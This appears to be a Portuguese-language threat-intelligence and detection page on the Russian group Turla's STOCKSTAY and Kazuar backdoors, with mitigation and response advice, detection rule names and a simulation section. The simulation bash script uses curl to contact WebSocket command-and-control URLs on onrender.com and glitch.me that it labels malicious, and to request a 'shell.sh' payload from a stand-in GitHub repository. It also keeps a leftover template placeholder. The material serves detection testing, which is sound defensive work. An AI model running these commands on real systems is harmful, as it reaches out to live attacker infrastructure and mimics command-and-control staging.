Turla (Blizzard Secreto): Backdoors STOCKSTAY e Kazuar Explicados
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Turla é um grupo APT de longa data, alinhado à Rússia, associado ao FSB e conhecido por operações de ciberespionagem contra alvos governamentais e militares. O grupo depende de malwares personalizados, incluindo os backdoors STOCKSTAY e Kazuar, para manter o acesso de longo prazo em ambientes comprometidos. Ele também frequentemente abusa de serviços na nuvem legítimos, como GitHub e Cloudflare, para disfarçar o tráfego de comando e controle.
Investigação
O relatório examina a evolução das ferramentas de malware do Turla, com foco nas famílias STOCKSTAY e Kazuar. Analisa as técnicas de sequestro de infraestrutura do grupo, seu uso de plataformas sem servidor para comando e controle, e sua capacidade de explorar vulnerabilidades, como a de caminho transversal no WinRAR. A investigação também destaca o uso de chaveamento ambiental pelo Turla para reduzir a exposição à análise em sandbox.
Mitigação
As organizações devem implementar monitoramento rigoroso para o uso não autorizado de plataformas web confiáveis, como GitHub e Cloudflare, quando os padrões de tráfego parecerem anormais. A rápida correção de vulnerabilidades como CVE-2025-8088 é essencial para prevenir gravações de arquivos não autorizados. Os defensores também devem ficar atentos à instalação não autorizada de certificados raiz e à execução suspeita de PowerShell ou VBScript que possam indicar atividade do Turla.
Resposta
Se atividade do Turla for detectada, os respondedores devem isolar os hosts afetados e investigar contas de administrador local não autorizadas. Uma revisão detalhada das árvores de processos deve ser realizada para descobrir o carregamento lateral de DLLs envolvendo binários legítimos, como utilitários da NVIDIA ou Brother Printer. A telemetria da rede também deve ser verificada para tráfego incomum de WebSocket, e o armazenamento de confiança da máquina deve ser revisado para alterações suspeitas de certificados.
Fluxo de Ataque
Detecções
Possíveis Pontos de Persistência [ASEPs – Hive do Software/NTUSER] (via evento de registro)
LOLBAS WScript / CScript (via criação de processo)
Uso do Certutil para Codificação de Dados e Operações com Certificados (via linha de comando)
Strings Suspeitas do PowerShell (via powershell)
Possível Serviço DNS Dinâmico foi Contatado (via dns)
Atividade de Descriptografia 3DES do Kazuar PowerShell [Windows Powershell]
Detecção de Comunicação C2 do Turla STOCKSTAY via WebSocket Seguro e Estadiamento no GitHub [Servidor Web]
Execução de Simulação
Pré-requisito: A Verificação Prévia de Telemetria e Linha de Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar exatamente a telemetria esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos errôneos.
-
Narrativa do Ataque & Comandos: Um adversário estabeleceu com sucesso uma posição e agora está tentando estabelecer comunicação C2. Para evitar detecção, usam uma abordagem “living-off-the-land” ao se conectar a uma plataforma sem servidor hospedada em
onrender.comvia conexão WebSocket. Simultaneamente, eles tentam puxar uma carga de segunda etapa de um repositório público do GitHub para se misturar com o tráfego de desenvolvedor. A simulação usarácurlandwscat(se disponível) ou solicitações web padrão para gerar os padrões de URL específicos definidos na lógica de detecção. -
Script de Teste de Regressão: [Provide the exact, self-contained, and executable code snippet for the simulation.]
#!/bin/bash # Script de simulação para Validação de Detecção de STOCKSTAY C2 echo "[+] Iniciando Simulação: TTPs do STOCKSTAY C2" # 1. Disparo: WebSocket C2 via Render (URL Específico) echo "[*] Simulando conexão de WebSocket para URL malicioso no Render..." curl -k "wss://google-ai-labs-it.onrender.com/ws" # 2. Disparo: WebSocket C2 via Glitch (URL Específico) echo "[*] Simulando conexão de WebSocket para URL malicioso no Glitch..." curl -k "wss://wool-basalt-clock.glitch.me/ws" # 3. Disparo: Estadiamento no GitHub (Correspondência de Domínio Ampla) echo "[*] Simulando estadiamento de carga via GitHub..." curl -I "https://github.com/malicious-actor/payload-repo/raw/main/shell.sh" echo "[+] Simulação Completa. Verifique alertas no SIEM." -
Comandos de Limpeza:
# Nenhum artefato persistente é criado no host por esta simulação. # Garanta que quaisquer arquivos bash temporários sejam removidos, se criados. rm -f simulation_stockstay.sh